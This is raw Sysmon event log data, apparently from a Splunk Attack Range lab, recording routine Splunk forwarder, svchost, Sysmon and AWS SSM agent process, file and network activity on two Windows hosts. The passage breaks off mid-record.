791 10341000x8000000000000000222795Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.661{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1981-6216-4C05-000000003902}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222794Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.661{4F8D34B0-1981-6216-4C05-000000003902}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222793Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.651{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-168MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222792Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.291{4F8D34B0-1980-6216-4B05-000000003902}11124004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000222791Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.696{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51740-false10.0.1.12-8000- 23542300x8000000000000000222790Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.994{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE3CAAB67456377DB9446A05079FA4F2,SHA256=C28DCD8E347478F1FEBF09AF9D6AA1A28FF869D40B7436FF7A70A2D4A1A3EC4C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222789Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.994{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1980-6216-4B05-000000003902}1112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222788Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:50.526{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F70F181B24ADD728E7E25B6B4ED3504F,SHA256=ECB042C887D958385FA30972B9FD37BC2AD56547B18A8E05E47292DB5DEEA751,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222809Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:50.149{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=631999607CE8FDA4CBADC492B0DD8EAB,SHA256=8336A6492B49E969705A1BE0AD4E16B2938C8EF7EC8F08CA5BA4053904D72060,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222808Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:50.149{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0ACD386F92E7EF03935C4208D61173B5,SHA256=36A93598D6BF985D120FF0C0AB463D1C3DA7A4FBD0A369146642E98B716FB885,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:51.574{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=345C8F497852DAC1FBD2299139B49546,SHA256=86DB0BAFFB8E563B4269CBE5FAC1F7383ADFF3939E28D83BCD6C8575749A4109,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222823Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.259{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1983-6216-4D05-000000003902}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222822Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222821Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222820Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222819Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222818Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222817Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222816Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222815Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222814Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222813Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.259{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1983-6216-4D05-000000003902}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222812Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.259{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1983-6216-4D05-000000003902}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222811Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.260{4F8D34B0-1983-6216-4D05-000000003902}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222810Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:51.166{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46B35A9B4C1ABB49D3BAD90B7AE34426,SHA256=5C335A517EC81845BC4E69ACF9E98E9EFA9D6C0CA91976186A2D6018D68FD3EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:52.589{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CAB069ED81D4E966E1BC72FA166BD3A,SHA256=B31872492001277E42547C13915F5941322C2B37CD016D9FFD8D94743FE04B5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222825Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:52.338{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DAEF3E1893B2E1397DDC5BCBDEA320D4,SHA256=0D69E3153E3B26CDFF188129C4A3AFF3D8EA528BB62746C191918AD428B0EE28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222824Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:52.213{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6684B88FF2F757DA18A2A35A255835D9,SHA256=61F8AB8B70C20B4DE585FD155654E395F8AB1E53D6F6411DEB7B9562EE10CD3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:53.624{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=011745938B7DB59E72DC35305F8E8A03,SHA256=D7D3A64DEC368B255683B1489D3CE69FE11427CD9AF7FA750E08FF12DE64BF25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222826Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:53.322{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBDD6D0EAB1FF2CE487F9B15AE2ED86E,SHA256=AEA66E43C1FA4E2D046BB2A72C78A9C06725623B62C129EDE5BF83EEFAC1BC01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:53.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 